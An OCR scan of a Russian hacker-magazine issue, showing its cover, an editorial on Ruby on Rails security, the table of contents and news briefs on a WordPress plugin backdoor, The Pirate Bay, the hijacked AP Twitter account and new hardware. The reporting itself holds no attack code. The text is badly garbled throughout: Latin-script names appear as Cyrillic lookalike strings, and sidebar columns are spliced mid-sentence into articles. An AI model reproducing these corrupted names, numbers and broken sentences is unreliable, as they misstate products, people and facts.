Х-РЕЛИЗ: КЛОН РПОРВОХ НА А21ІПЕ 



НОВАЯ ПАЧКА АТАК НА ХМІ. 





ѴѴѴѴѴѴ.ХАКЕР.Ри 





Игротека: 
семь игр 




РЕКОМЕНДОВАНЫ 
ЦЕНА: 270 




свои проект 



і8 






а 



-ч 



За последний год в РиЬу оп Раііз 
нашли множество уязвимостей. 
Мы расскажем, как обезопасить 
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Когда-то давно перед программистом стоял выбор: писать 
все с нуля или воспользоваться каким-нибудь фреймворком. 
Сейчас чаще всего стоит вопрос, какой фреймворк исполь- 
зовать. 

Если бы в 2006-м не было НиЬуоп Раіів, то мир, возможно, 
никогда не увидел бы Тѵі/іПег. Хорошо написанные фреймвор- 
ки открыли для разработчиков то, что раньше сложно было 
представить, — возможность за фантастическое время полу- 
чить прототип приложения. И при этом сразу заложить в него 
простор для будущего масштабирования. 

Фреймворки дали турбонаддув процессу разработки, 
но и загнали в определенные рамки. Появилась целая плея- 
да программистов, которые без чужого каркаса написать уже 
ничего не способны. А некоторые из фреймворков в погоне 
за универсальностью превратились в таких громоздких мон- 
стров, что изучить их стало в пять раз сложнее самого языка 
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программирования. 

У противников фреймворков вообще немало аргументов. 
И безопасность — один из них. «Если часть кода написана 
дядей Васей, которого ты никогда не видел, то о какой без- 
опасности может идти речь?» Но я убежден: развивающиеся 
фреймворки с большим комьюнити гораздо более безопас- 
ны, чем код среднестатистического программиста, и более 
того — сами ограждают проект от многих бед вроде {ЗОІ_і, 
С8НР, Х55}. 

За последний год в рельсах обнаружились уязвимости, 
позволяющие удаленное исполнение кода, — и тысячи ре- 
сурсов разом оказались уязвимы к атакам. Антиаргумент 
в пользу безопасности. Но мы решили разобраться: стоит ли 
из-за этого отказываться от модного фреймворка и возмож- 
но ли вообще на нем писать безопасные приложения? 
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Самые важные уязвимости проектов на ВиЬу оп Ваііз 
и способы их лечения 
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Все новое за последний месяц 

Как узнать ІР ламера в чате расположение человека 

Измерение пульса человека по видеоряду 

Проблемы безопасности фреймворка НиЬуоп Яаіізи способы их решения 

Интервью с создателем Полом Мокапетрисом 

Подбираем генератор статических страниц для быстрого и надежного блога 

Хакерский быт в играх: история вопроса 

Нестандартные способы монетизации софта и цифрового контента 

История российского йеісоп в лицах 

Большой тест антивирусов для Апбгоіб 

Шифруем память смартфона, Зй-карту и содержимое ОгорЬох 

Хакерские секреты простых вещей 

Анализ свеженьких уязвимостей 

Организация открытой ѴѴі-Рі-точки для вечеринки с клиентами 
Универсальный мобильный шпион: подслушиваем вибрации 
Разбираем варианты проведения атаки через сущности параметров ШІ 
Обзор интересных инструментов с прошедших хакерских конференций 
Вид Воипіу — другая сторона медали 

Фреймворки для динамической бинарной инструментации. Часть 2/3 

7 утилит для исследователей безопасности 

Ал Эк говорит, что у него даже есть рабочие исходники 

Анализируем малварьдля РОЗ-терминалов 

Получение и обработка данных о скелете и жестах 

Наш ЙгорЬох на ѴѴіпсІоѵѵз Аіиге 

Парсим крупный форум с помощью реверсингаегоАпсІгоіб-приложения 
Новая партия интересных задач, которые дают на собеседованиях 
Обзор наиболее значимых и интересных событий в мире дистрибутивостроения 
Улучшаем и дополняем советы блогеров 
Изучаем новинку ѴМѵѵаге Ногігоп Зиііе 

Разворачиваем корпоративную систему криптографической защиты 

Обеспечение сетевой безопасности с помощью программно-конфигурируемых сетей 

Обзор последних новинок от Асег 

Тестирование компактных компьютеров для работы и отдыха 

Вопросы и ответы 

8,5 Гб всякой всячины 

Удобные меЬ-сервисы 
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Как объясняют производители 
ПК (в частности, Асег ) , МісгозоЙ 
слишком рано поставила крест 
на традиционных ПК. В ѴѴіпсІоѵѵз 
8 в прямом смысле «похоронили» 
десктоп, скрыв его от пользо- 
вателя. 
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РАБОТОЙ НАД ОШИБКАМИ В ѴШРОѴѴЗ 8 




оронить «восьмерку» — модно, весело, спортивно, 
об этом знают все. Однако до точки кипения ситуа- 
цию довела аналитическая компания ЮС, заявившая, 
что ѴѴіпсіоѵл/з 8 попросту «затормозила» рынок ПК вме- 
сто того, чтобы дать ему новый толчок и сделать его 
вновь актуальным в дивном новом мире мобильных 
устройств и облачных сервисов. 

Не так давно мы сравнили ситуацию, сложившуюся 
вокруг выхода ѴѴіпсІоѵѵз 8, с выходом ѴѴіпсІоѵѵз 3.1 — пе- 
реход оказался не менее сложным. В компании объявили, что 
до конца года выпустят бесплатное промежуточное обновление 
ѴѴіпсІоѵѵз 8.1 под кодовым названием ѴѴіпсІоѵѵз Віие, в котором 
должны устранить хотя бы часть того, что так не понравилось 
пользователям традиционных десктопов. Интересно, а будет 
в следующем году ѴѴіпсІоѵѵз 8.11? 
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В свою защиту МісгозоЙ указывает на 100 миллионов проданных копий 
«восьмерки». Традиционно, по этой цифре нельзя судить об успехе ОС. Речь 
идет об ОЕМ -версиях, поставляемых с новыми ПК и планшетами. Нельзя 
даже с уверенностью говорить, достигла ли большая часть этих копий конеч- 
ных пользователей или же привязана к еще не проданным компьютерам. 

В отчете ЮС совсем другая картина. Спрос снизился на 13,9% по сравне- 
нию с тем же периодом в прошлом году {в первом квартале 2013 года было 
продано 76,3 миллиона ПК), и ЮС ставит это в вину ѴѴіпсІоѵѵз 8. То есть одна 
из причин снижения продаж «персоналок» — выход новой ОС. Стоит ска- 
зать, что цифры действительно скверные, это худший результат за все время 
наблюдений, то есть с 1994 года. Для сравнения: по данным других анали- 
тиков — Сагіпег, падение составляет 11%, что тоже совсем нехорошо. Раз- 
умеется, рынок персональных компьютеров пострадал также от смартфонов 
и планшетов, но именно выход «восьмерки» явно ухудшил положение. 

Остается только ждать подробностей, потому что сейчас сложно пред- 
угадать, насколько радикально в МісгозоЙ готовы по- 
дойти к решению проблемы. Трудно предположить, 
что нас ждет полный отказ от Меіго и возврат Аего. 
В конечном счете — зачем делать вторую «семерку», 

ого импульса рынку и к, если уже есть первая? Однако в МісгозоЙ поняли, 

что с их флагманским продуктом есть проблемы, и го- 
I € 20 » товы довольно оперативно их решать — и это главное. 



Шпйош 5 8 не только 
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КУРС 

молодого 

ІТ-БОИЦА 



наше время самообразование стало куда доступнее: 
нашему вниманию предлагаются почти бездонные би- 
блиотеки на разных языках, дистанционное обучение, 
виртуальные лекции и многие другие инструменты 
получения знаний. Но, как известно, ничто не заменит 
практику. Очевидно, именно об этом думали авторы курса Маііазапо 
Сгуріо СНаІІепдез ( таіазапо.сот/агіісіез/сгуріо-сііаііепсіез ). соз- 
давая свой необычный сборник задач. 

Курс рассчитан на весьма широкую аудиторию от хакеров 
до веб-разработчиков и будет интересен людям, которые не прочь 
прокачать свои умения на практике, вместо штудирования теоре- 
тических материалов. Маіазапо Сгуріо СІпаІІепдез состоит из 48 
упражнений и задач, суть которых — атака на реальные крипто- 
графические приложения. Самая настоящая практическая работа 
«в поле». 

Чтобы попробовать свои силы, нужно связаться с авторами про- 
екта по почте (сгур1ораІз@та1азапо.сот), после чего ты получишь 
комплект из первых восьми задач. Если сумеешь с ними справиться 
и дашь верные ответы, получишь следующую партию и так далее. 

Особенную пикантность этой затее придает полное отсут- 
ствие туториалов и правильных ответов. Авторы Маіазапо Сгуріо 
СНіаМепдез убедительно просят всех участников курса не публико- 
вать в открытом доступе никакой информации даже о самих зада- 
чах, не говоря уже о правильных ответах и решениях. 
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Просьбы авторов — это, конечно, хорошо, но шила в мешке не утаишь. 
Уже известно, что в курс включены следующие темы: Н5А, алгоритм 
Диффи — Хеллмана, замена символов и ХОВ, потоковые и блочные шиф- 
ры и их режимы шифрования. 







ГИБРИДНЫИ УЛЬТРАБУК 
ОТ АЗІІЗ 



ДВАДИСПЛЕ! 
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С тартовали продажи любопытной новинки от Азиз — ультрабук 

ТаісЫ 31 на базе ѴѴіпсІоѵѵз 8 может похвастаться сразу двумя РиІ! 
НЮ дисплеями, благодаря чему ему удается сочетать функцио- 
нальность планшета и ноутбука одновременно. После планшетов- 
трансформеров это даже почти не удивляет :). 

Оба ІРЗ-дисплея ТаісІіі 31 имеют размер 13,3 дюйма и подключены к одной 
и той же аппаратной платформе. Основная фишка заключается в том, что экра- 
ны могут функционировать как независимо друг от друга, так и в связке, бла- 
годаря чему с устройством могут работать одновременно два пользователя. 
Можно смотреть фильмы вместе, или, например, один пользователь может 
сидеть в инете, а другой в это время будет смотреть фильм. Поддерживается 
ввод как с помощью прикосновений пальцев, так и при помощи стилуса. 

Под капотом новинки кроются Іпіеі Соге третьего поколения, интегриро- 
ванная Іпіеі НЮ ОгарЫсз 4000, 4 Гб ООН 3 1600 МГц, твердотельный накопи- 
тель ЗАТА II! ЗЗЭ 128 Гб или 256 Гб, ѴѴі-Рі (802. 11 а/Ь/д/п), ВІиеІооІИ 4.0 и поли- 
мерная батарея на 53 Вт ■ ч. Средняя цена гаджета 62 тысячи рублей. 




А Дата релиза Рігеіох 05 — это 

июнь 2013 года, совсем скоро. 
Система дебютирует в Бразилии, 
Венесуэле, Испании, Польше 
и Португалии. 



А В НТМІ.5 добавят ІІПІ -схему 
для платежей Віісоіп. Благодаря 
этому перечислить ВС на любой ко- 
шелек станет возможно буквально 
одним кликом. 



Государство призвало про- 
вайдеров Японии блокировать 
Тог-трафик. Пока на добровольных 
началах и только ІР известных риле- 
ев Тог, что в открытом доступе. 



-А Начиная с 2007 года в іРНопе 
обнаружили больше уязвимо- 
стей, чем в смартфонах на АпбгоісІ, 
ВІаскВеггу и ѴѴіпсІоѵѵз, сообщает 
компания Зоигсеііге. 











МЕСАЫЕМЗ 




ѴѴОРЮРНЕЗЗ 
ПОД ПРИЦЕЛОМ 



ПОПУЛЯРНЫЙ ДВИЖОК ПОДВЕРГСЯ АТАКАМ СРАЗУ 
С НЕСКОЛЬКИХ СТОРОН 

О дин из наиболее популярных в Сети бесплатных 

движков ѴѴогсІРгезз внезапно оказался под при- 
стальным вниманием хакеров. Разумеется, подоб- 
ные платформы постоянно подвергаются атакам, 

НО В ЭТОМ Месяце ѴѴоГСІРгеЗЗ КаК-ТО ОСОбеННО Не ПОВеЗЛО. Текущий размер 

Сначала приключилась неприятность с популярнейшим ботнета из М/огбРгеез- 
плагином зосіаі-тесІіа-\л/ісідеі. Данный плагин используется серверов уже оцени- 

для реализации виджета для вставки кнопок быстрого обра- вается в более чем 

щения к социальным сетям, и количество скачивании плагина 100 тысяч хостов. Са- 

приближается к миллиону. В релизе 3.3 в код зосіаі-тесііа- мое неприятное в том, 

Ѵі/ісІдеТ просочились посторонние вставки, загружающие что бэкдор внедряют 
с внешних сайтов блоки для подстановки спама в форме ЗЕО- прямое движок, так 
ссылок на сайт, использующий плагин. Судя по всему, у од- что смена пароля тут 
ного из разработчиков перехватили доступ к репозиторию. не поможет. Поражен- 

Итог — тысячи пострадавших сайтов и исключение плагина ныйсайтприсоеди- 
из каталога ѴѴогсіРгезз. няется к брутфорсу. 

Но на этом неприятности только начались. Далее последо- используется для со- 

вала мощная атака на тысячи ѴѴогсІРгезз-серверов, целью ко- вершения РРо5-атак 
торой стал брутфорс пароля к админкам. Если подбор пароля и иных характерных 
удался, сервер становится частью ботнета. для ботнета действий. 






СМАЙЛИКОВ 
В ЯДРЕ 

— ^ Хорошо быть любопытным. Энтузи- 
аст Джеймс Фейтор (студент Роче- 
стерского технологического института) 
проанализировал код ядра 1_іпііх 
3.8.8. Исследование вышло не совсем 
обычным, так как Джеймс решил под- 
считать... смайлики в коде. Оказалось, 
что в ядре 90 раз встречается комби- 
нация символов «;-)». 






— > В интервью изданию 
Вивіпезз Іпзігіег Дэн Камински 
признался, что еще два года 
назад пытался взломать Віісоіп, 
но так и не сумел найти в системе 
уязвимостей. 



— А’ Компания НозІЕхрІоіі призна- 
ла Россию «лидером» по вре- 
доносной активности в АЗ-сетях 
в четвертом квартале 2012 года. 

Мы возглавляем этот список уже 
третий раз подряд. 



РЕПОЗИТОРИЕВ 

(ЗіІНиЬ отпраздновал пятилетие и по 
этому случаю раскрыл кое-какую стати- 
стику. С 2008 года количество пользовате- 
лей проекта выросло с 6 тысяч до 3,5 мил- 
лиона человек, а число репозиториев 
увеличилось с 2,5 тысячи до 6 миллионов. 
Также в прошлом году сервис получил 
100 миллионов долларов инвестиций. 
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В «ПИРАТСКОЙ БУХТЕ» 
НЕСПОКОЙНО 

ЗНАМЕНИТЫЙ ТРЕКЕР СНОВА«ШТОРМИТ», А ЕГО БЫВШИХ АДМИНОВ ВСЕЖЕ 
НАСТИГАЕТ ПРАВОСУДИЕ 

О пять неспокойно в стане самого скандального торрент-трекера сети. ТНе Рігаіе 

Вау в очередной раз попытался сменить домен, так как адрес в зоне .зе все же 
находится в юрисдикции шведских властей, которые, очевидно, почти дозрели 
до попытки изъять у трекера текущий домен. Предполагалось, что на старом 
адресе останется лишь редирект, а «Бухта» переместится в зону .ді, относя- 
щуюся к Гренландии. Однако все пошло не так, как планировалось. В Гренландии пиратам 
почему-то не обрадовались, и регистратор ТЕ1_Е-РОЗТ почти сразу заблокировал домены 
№іеріга*еЬау.дІ и рігаІеЬау.дІ. ТЕІ_Е-РО$Т любезно сообщили: такое решение продиктовано 
тем простым обстоятельством, что домены будут использоваться для размещения неле- 
гального контента. Вопрос насчет нелегального контента, конечно, спорный, ведь на самом 

трекере ничего незаконного нет, но препи- 
раться с гренландцами администрация Тіпе 
РігаГе Вау не стала. В итоге портал просто 
переехал в зону ,із, которая относится к Ис- 
ландии. Здешние нравы оказались попроще, 
исландцы не намерены блокировать «Бухту», 
пока их об этом не попросит суд. Издание 
ТоггепІРгеак отмечает, что на этот случай 
в запасе у трекера есть и другие домены. 

Менее радужно складываются обстоя- 
тельства вокруг Готфрида Свартхольма — 
одного из основателей ТРВ, которых с та- 
кой помпой судили в 2009 году. Напомню, 
что Свартхольма еще тогда объявили в меж- 
дународный розыск, в то время как он на- 
ходился в Камбодже (притом по состоя- 
нию здоровья). Осенью прошлого года его 
неожиданно арестовали камбоджийские 
власти, видимо сумевшие наконец догово- 
риться со своими европейскими коллега- 
ми. Готфрида почти сразу экстрадировали 
в Швецию, где прямо в аэропорту обвини- 
ли... в хакерской атаке. 

Сейчас обстоятельства ареста наконец проясняются. Прямо скажем, выглядит все это 
нехорошо, а Свартхольм вдруг оказался настоящим суперхакером. Ему и еще трем людям, 
чьи личности не раскрываются, предъявили обвинения в мошенничестве в крупном раз- 
мере, попытке совершения мошенничества и помощи в мошеннических действиях. Якобы 
Свартхольм пытался получить доступ к огромным пластам информации от разных компа- 
ний и государств (!), в том числе к персональным данным и номерам социального стра- 
хования. И занимался он этим систематически, «в результате чего его действия подорва- 
ли доверие общественности к банковской системе». До кучи Свартхольма обвинили и во 
взломе банка ІМогбеа Вапк. Якобы он пытался украсть 5,7 миллиона шведских крон (около 
900 тысяч долларов), но в итоге сумел вывести лишь 27 тысяч. 



Иге Рігаіе Вау 
переехал в зону 
. І5, которая от- 
носится к Ислан- 
дии. ТоггепіГгеак 
совершенно спра- 
ведливо отмеча- 
ет, что в запасе 
у «Бухты» еще 
десятки доменов 




Ожидается, что новый 
процесс по делу 
Готфрида Свартхольма 
начнется уже в атом 
месяце. К тому моменту 
должен подойти к концу 
срок, который Сварт- 
хольм отбывает сейчас. 
Вряд ли Свартхольм 
вообще выйдет на 
свободу во время этой 
«пересменки», так как 
власти опасаются, что 
он покинет страну. 




АКЮ БУДЕТ 
ПРОИЗВОДИТЬ АРМ- 
ЧИПЫ 



— ^ Представители компании АМО подтвердили выпуск 
линейки АРМ-чипов для встраиваемой техники. Пере- 
ход на новую архитектуру произойдет в рамках линей- 
ки С — это процессоры со сверхнизким потреблением. 




ФИЛЬТРАЦИЯ ИНТЕРНЕТА 
ОТ ЯНДЕКСА 

Компания «Яндекс» запустила сервис Яндекс.ОМЗ, 
позиционирующийся как инструмент для безопасного 
серфинга. 77.88.8.8 обеспечит режим без фильтрации, 
77.88.8.88 блокирует доступ к сайтам с вредоносным 
ПО, а 77.88.8.7 также отфильтрует сайты с «контентом 
для взрослых». 




ЗАМЗЫЫО ПРОТИВ 
ФАЛЬШИВЫХ ОТЗЫВОВ 

— Ц На Тайване скандал и суд — местное представи- 
тельство Затзипд уличили в написании тысяч фаль- 
шивых отзывов на собственные продукты. Интересно, 
что руководство компании решило не отпираться, 
а просто распорядилось, чтобы тайваньский филиал 
прекратил самодеятельность. 
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ОЕВІАЫ 7 И НОВЫЙ 
ЛИДЕР ПРОЕКТА 
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эМУТКУРСЛИНУКСОИДЫ ПОД РУКОВОДСТВОМ НОВОГО ЛИДЕРА 



К огда ты будет ь держать этот номер в руках, ОеЬіап 7 

уже выйдет в свет — релиз свежей версии назначен 
на начало мая. Изменений будет много (все же но- 
вые версии выходят нечасто), но сейчас мне хоте- 
лось бы остановиться даже не на самом ОеЬіап, а на том факте, 
что у проекта сменился лидер. 

Как ты знаешь, лидера проекта выбирают ежегодно (даже 
если ты об этом не знал, то теперь уже знаешь:)). Последние три 
года этот пост бессменно занимал Стефано Закироли, однако 
в этом году он не стал выдвигать свою кандидатуру, и за долж- 
ность «сражались» кандидаты, не имеющие опыта в этом ста- 
тусе. К слову, некоторые пессимисты полагают, что поводом 
для такого решения послужили опасения, что ОеЬіап 7 в этом 
году может не выйти, и Закироли не хотелось ударить в грязь 
лицом. Как бы то ни было, победа на выборах досталась Лукасу 
Нуссбауму, доценту Университета Лотарингии, где РеЫап явля- 
ется частью курса. 

Нуссбаум принимает участие в разработке дистрибути- 
ва с 2005 года, выступает мэйнтейнером пакетов, связанных 
с языком НиЬу, и успел поспособствовать укреплению со- 
трудничества между разработчиками РеЫап и ІЛэипІи. В сво- 
ей предвыборной программе Лукас говорил о том, что нужно 
интенсивнее внедрять инновации, укреплять сотрудничество 
с ирнігеат- проектами и устранять помехи, мешающие энту- 
зиастам принимать участие в работе над проектом (например, 
улучшить документацию, упростить формальные процессы 
и рецензирование, а также заняться совместной поддержкой 
пакетов). В качестве новых продуктов были упомянуты і_іѵе- 
сборки дистрибутива и пригодный для использования «просты- 
ми смертными» репозиторий с гоіііпд-обновлениями. Нуссбаум 
пояснил, что репозиторию Тезііпд уже 13 лет, но он до сих пор 
остается решением не для всех. Между тем Іібипіи как раз по- 
думывают о переходе на ИЗ- релизы (раз в два года) и проме- 
жуточные гоіііпд -обновления. А значит, ОеЬіап может утратить 
свой козырь — возможность, доступную уже много лет, но, увы, 
непригодную для обычных пользователей. А привлечение но- 
вых людей к ветке Тезііпд, по мнению Лукаса, повлечет за собой 
улучшение качества и стабильных выпусков. 





В выборах 2013 года 
приняли участие 
390 разработчиков, 
что составляет 39,4% 
от всех участников, 
имеющих право голоса 
(в прошлом году явка 
составила 42%, в поза- 
прошлом — 43%). 





ШИФРОВАНИЕ? 

НЕ, НЕСЛЫШАЛИ 

— ^ Довольно печальной статистикой из области В2В 
поделилась «Лаборатория Касперского». Поданным 
ЛК, 35% компаний в мире вообще не используют 
шифрование данных. Что еще грустнее — в России 
этот показатель и вовсе достигает 38%. Корпоратив- 
ный шпионаж и утечки данных не пугают этих людей. 




«ЖЕЛЕЗО» В КИТАЕ 
БОЛЬШЕ НЕ ПОКУПАЕМ 



— > Президент США Барак Обама подписал за- 
конопроект, согласно которому НАСА и ряд других 
министерств больше не могут закупать ИТ- и теле- 
ком-оборудование, произведенное в Китае. Причина, 
разумеется, в кибершпионаже и хакерских атаках, 
представляющих угрозу национальной безопасности. 




КРУПНЕЙШИЙ ПУНКТ 
ОБМЕНАТРАФИКОМ 



Последние три года лидером проекта 
был Стефано Закироли, но в этом году 
он не стал выдвигать свою кандидатуру 



— > Во Франкфурте-на-Майне к концу года появится 
новая крупнейшая на планете платформа обмена 
трафиком ОЕ-СІХ АроІІоп. Точка обмена строится 
на платформе РЗР 3000 производства АОѴА Оріісаі 
Меіѵгогкіпд, поддерживающей скорости до 2 Тбит/с 
для каждой оптоволоконной пары. 
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СѴВЕЙ ІМТЕШБЕЫСЕ 8НАПШБ Б- РИОТЕСТІОМ АСТ 



СІЗРА 

ПРОВАЛИЛАСЬ 

ПРИЕМНИК50РА И РІРА ПРИКАЗАЛ ДОЛГО ЖИТЬ 




ще живы воспоминания о массовых протестах прошлого 
года, направленных против законопроектов ЗОРА и РІРА, 
рассмотрение которых в итоге было отложено. Но на сме- 
ну этим инициативам уже пришла новая - СІЗРА. Суть до- 
кумента, существующего с 2011 года, примерно та же, что и у пред- 
шественников: законопроект расширяет возможности американских 
правоохранительных органов и правообладателей в борьбе с неле- 
гальным контентом в интернете, торговлей интеллектуальной соб- 
ственностью, защищенной авторским правом, и контрафактом. Если 
вдуматься, то СІЗРА выглядит даже хуже, чем пресловутая ЗОРА. 

Законопроект настолько неприятный, что в Сети уже начала под- 
ниматься очередная волна негодования, а Апопутоиз принялись 
агитировать за массовые протесты и отключения сайтов, а также 
за «профилактический БОоЗ». Но к счастью, на этот раз ничего по- 
добного не потребуется, — ключевой 
комитет сената вынес законопроекту 
негативную оценку, а это почти авто- 
матически означает, что принять его 
невозможно. Официальной причиной 
назвали недостаточную защищенность 
приватности пользователей. Председа- 
тель комитетаДжей Рокфеллер выразил 
уверенность, что Сенат не примет зако- 
нопроект в текущем виде. Ранее другие 
представители Белого дома тоже гово- 
рили о том, что президент не подпишет 
подобную бумагу. Ура, что ли? 



Несмотря на то что доку- 
мент «забанили» в сена- 
те, торговая ассоциация 
ТесНЫеі, представля- 
ющая Соодіе, ѴаИоо! , 
МісгоноЦ, НР, Огасіе 
идругиеІТ-компании, 
поддержала законопро- 
ект. Против выступали 
МогіІІа и сооснователь 
КегісШ Алексис Оханиан. 



ГЛОБАЛЬНАЯ ЗАЧИСТКА 
В ООООЬЕ РІ_АѴ 



П охоже, беззаботные деньки, когда опубликовать приложение 

в Соодіе РІау мог практически каждый, подошли к концу. Скажем 
прямо, столь либеральная политика Соодіе не раз приводила к по- 
паданию в магазин откровенно вредоносных программ, так что эти 
изменения, конечно, к лучшему. Но интересно то, с каким рвением 
Соодіе взялась за «весеннюю уборку». Перед очередным обновлением Соодіе 
РІау, начиная с февраля месяца, из магазина удалили более 60 тысяч прило- 
жений — абсолютный рекорд на сегодняшний день. Притом под удаление по- 
пали даже программы, продающие рингтоны и другие почти безобидные вещи. 
В Соодіе от комментариев отказываются, зато ТесбСгипсб сообщает, что все 
же никто не собирается вводить систему, подобную системе Арріе, когда перед 
появлением в магазине приложение должно быть сначала одобрено. 

Кроме того, в Соодіе недавно обнаружили, что РасеЬоок обновляет свое 
приложение в обход механизма магазина. Благодаря этому в условиях исполь- 
зования Соодіе РІау появился новый пункт, категорически запрещающий по- 
добную практику. 



Открытость АпсІгоісІ 
предсказуемо при- 
вела ктому, что другие 
компании захотели 
отъесть кусокпирога 
от все более успешной 
платформы Соодіе. 
Печально, что заняться 
чисткой РІау компания 
решила не в интересах 
пользователей, а из-за 
угрозы от РасеЬоок 
и Атагоп. 

ѴѴе'ѵе сЬапдесІ а {еѵѵ 
іМпдз агоипсі Неге... 

Соо 
Ьгоѵ 
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Министерство коммуника- 
ций Великобритании встрево- 
жено: там внезапно обнаружили, 
что у 55% пользователей одина- 
ковый пароль для всех сайтов. 



— ^ Главной вирусной угрозой 
прошлого месяца в России 

снова стал троян ѴѴіп32/0НозІ, ко- 
торый удерживает лидерство уже 
три месяца, сообщает Езеі. 



Вышел Меіавріоіі 4.6. До- 
бавлено 138 новых модулей, 

в том числе 80 эксплойтов, 44 
вспомогательных модуля и 12 
модулей для использования после 
взлома. 



Пятнадцатилетие отметила 
Могіііа. На сегодняшний день 
пользователи Могіііа есть на всех 
континентах, даже в Антарктиде, 
где РігеІЪх использует 80% на- 
селения. 
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КОМНАТНОЕ 

ОБЛАКО 

ИНТЕРЕСНЫЙ ПРОЕКТ С КІСК5ТАПТЕП 

ряд ли кто-то станет спорить, что облачное хранение 
данных — это удобно. Однако помимо неуверенности 
в безопасности данных, которые хранятся «где-то там», 
у облаков есть и еще один минус: стоимость хранения 
крупных объемов. Все сервисы, будь то РгорЬох, іСІоиб 
или Соодіе Огіѵе, предлагают купить дополнительное пространство 
за немалые деньги. К примеру, ОгорЬох просит 500 долларов в год 
за 500 Гб. И эту проблему, похоже, мог бы решить проект Зрасе 
Мопкеу. 

Зрасе Мопкеу уже собрали на КіскзІагТег более 260 тысяч дол- 
ларов, против необходимых 100 тысяч, а также удостоились заме- 
чательных отзывов в прессе. Почему? Потому что все гениальное 
просто. Технически Зрасе Мопкеу — это обычный жесткий диск ем- 
костью 1 Тб с подключением к интернету. Но по сути это облако, ра- 
ботающее прямо у тебя дома. Скорость передачи данных по локаль- 
ной сети будет в 15-60 раз выше, чем если сообщаться с другими 
облачными сервисами. Удаленно, если ты вне дома, скорость будет 
обычной, то есть не хуже, чем коннект к ОгорЬох. Но главный козырь 
здесь цена — предварительный заказ на гаджет можно оформить 
за 99 долларов, которые предполагают 12 месяцев использования. 





Еще одна фишка 
Зрасе Мопкеу состоит 
атом, что данные 
хранятся нелокально, 
а распределяются 
между устройствами 
Зрасе Мопкеу по все- 
му миру (в виде не- 
больших за шифрован- 
ных архивов) . Кроме 
того, на жесткий диск 
сохраняется бэкап, 
на случай отсутствия 
интернета. 




Нгі 




САМЫЙ БЫСТРЫЙ 
ДОМАШНИЙ 
ИНТЕРНЕТВМИРЕ 




— > Л и нус Торвальдс предста- 
вил финальную версию ядра 
І-іініх 3.9. Список изменений огро- 
мен, изучить его целиком можно 
в письме Торвальдса: Іѵѵп.пеі/ 
АіТісІез/539179. 



В Австралии арестован 
пентестер Мэтью Флэннери, 

известный как АизМОк. Он открыто 
называл себя лидером хакерской 
группировки ЦЛгЗес, за что и по- 
платился. 



-р> Японцы традиционно впереди пла- 
неты всей. Интернет-провайдер Зо-пе! 
ЕпіегіаіпппеіФ начал предоставлять до- 
ступ в интернет на рекордной скорости: 
до 2 Гбит/с. Сервис уже работает в Токио 
и шести прилегающих префектурах. Цена 
не кусается. Услуга стоит 51 доллар в месяц 
при заключении контракта на два года. 
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ХАКЕРЫ И СМИ 

ХАКЕРЫ ВЗОРВАЛИ БЕЛЫЙ ДОМ И СНИЗИЛИ КОТИРОВКИ 



прошедшем месяце имел место сразу ряд инцидентов, связанных с различ- 
ными СМИ и хакерами. Отчего у киберпреступников вдруг проснулся интерес 
к медиа, неизвестно, но случаи все как один занимательные. 

Очень показательная история, к примеру, приключилась с Аззосіаіеб Ргезз. 
23 апреля в твиттере агентства появилась «экстренная» запись о том, что в Белом доме 
взорвались две бомбы и президент США Барак Обама ранен. Как ты понимаешь, новость 
была липовая, а твиттер АР попросту взломали. Ответственность за взлом чуть позже 
взяла на себя группировка Зугіап Еіесігопіс Агту, поддерживающая сирийского прези- 
дента Башара Асада. Эти парни делают 
подобное не впервые, еще осенью 2011 
года они взломали сайт Гарвардского 
университета, разместив на нем сообще- 
ния о «политике убийств» США в Сирии. 
Позже и вообще пошла настоящая волна 
хаков: Зугіап Еіесігопіс Агту взломали ми- 
кроблог «Аль-Джазиры», в феврале 2013 
года — твиттер фотоде парта мента агент- 
ства Адепсе Ргапсе-Ргеззе, в марте — не- 
сколько аккаунтов «Би-би-си», а в апре- 
ле — аккаунт @60тіпи1ез одноименной 
новостной передачи на СВЗ. 

Но больше самого взлома интересна 
реакция наэтофейковое сообщение. Твит 
появился в 13:08, и уже через несколько 
секунд фондовый индекс З&Р упал с 1573 
до 1558 пунктов, то есть примерно на 1%. 
Затем, буквально за несколько минут, по- 
казатели восстановились до прежних зна- 
чений. Новостные порталы тоже повели 
себя не совсем адекватно. В частности, 
ІМеѵѵзги.сот полностью поверили в проис- 
ходящее и уже обещали опубликовать подробности «в ближайшие минуты». Виззіа Тобау, 
сообщая новость, и вовсе ссылались на какие-то мифические «собственные источники». 

Из всего этого можно сделать вывод, что рынок, СМИ и общественность внимательно 
следят за информационными потоками, реагируют на сообщения быстро и порой слиш- 
ком остро. Хотя ТѵѵіИег и превратился в инструмент для передачи и распространения экс- 
тренных новостей, в связи с участившимися взломами информагентств, наверное, стоит 
почаще вспоминать тезис «На заборе тоже написано» и думать прежде, чем делать. 

Между тем сами хакеры ощутили нужду в собственном новостном портале, свободном 
от политически мотивированных данных и слухов. Через фонд привлечения финансов 
Іпбіедодо пользователь баска! Апоп собрал почти 55 тысяч долларов (хотя требовалось 
всего две тысячи) на создание новостного сайта Апопутоиз. В этом «теневом Кіскзіагіег» 
поучаствовали 1307 человек, в основном они вносили деньги, покупая атрибутику (круж- 
ки, футболки и прочее) с символикой Апопутоиз. Ждем открытия ѴоигАпопІЧеѵѵз. 



Хакеры ощу- 
тили нужду 
в собственном 
новостном пор- 
тале, свободном 
от политически 
мотивированных 
данных и слухов 





шѳѳвпоѳ 

0ИШИѲ 




ЗАЧЕМ СМАРТФОН, ЕСЛИ 
ЕСТЬ КАЛЬКУЛЯТОР! 



— > Компания НР выпустила калькулятор, дизайн которо- 
го запросто посрамит некоторые смартфоны. Графиче- 
ский калькулятор НР Ргіте внешне похож на смартфоны 
ВіаскВеггу, оснащен 3,5-дюймовым сенсорным дис- 
плеем, множеством физических клавиш, и на нем можно 
запускать приложения. 




НАГРАДА НАШЛА СВОИХ 
ГЕРОЕВ 



— > Объявлены лауреаты премии Тьюринга — 2012, 
ими стали двое профессоров МП" — Сильвио Ми кал и 
и Шафи Гольдваесер. Их наградят за новаторские 
работы по вероятностному шифрованию и работы 
по применению доказательств с нулевым разглашени- 
ем в криптографических протоколах. 




Тем временем ре- 
дактор социальных 
сетей портала геиіегз. 
сот Мэттью Киз, 
обвиненный в связях 
с Апопутоиз (и по- 
мощи им во взломе 
ТНе ТгіЬипе Сотрапу) , 
был уволен. Киз по- 
прежнему отрицает 
свою вину, но ему 
грозит до десяти лет 
лишения свободы . 

В Веиіегз от коммента- 
риев отказываются. 





В РУНЕТЕ КРАДУТ ДЕСЯТ- 
